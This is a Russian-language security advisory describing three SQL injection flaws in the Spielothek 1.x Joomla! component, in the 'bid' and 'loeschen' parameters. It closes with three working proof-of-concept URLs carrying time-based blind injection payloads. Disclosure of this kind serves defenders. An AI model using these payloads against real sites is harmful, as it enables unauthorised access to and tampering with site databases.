Программа: Spielothek 1.x (component for Joomla!)

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения.

1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "bid" сценарием index.php (когда "option" установлен в "com_spielothek"
и "task" установлен в "savebattle") перед выполнением SQL запросов в файле
models/battle.php. Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольные SQL команды в базе данных
приложения.

2) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "bid" сценарием index.php (когда "option" установлен в "com_spielothek",
"view" установлен в "battle", и "wtbattle" установлен в "play") перед
выполнением SQL запросов в файле views/battle/view.html.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

3) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "loeschen" сценарием index.php (когда "option" установлен в "com_spielothek"",
"view" установлен в "battle", "wtbattle" установлен в "ddbdelete", b "dbtable"
установлен в "vS") перед выполнением SQL запросов в файле models/battle.php.
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://site/path/index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))

http://site/path/index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1
OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))

http://site/path/index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1
OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))



Оставить мнение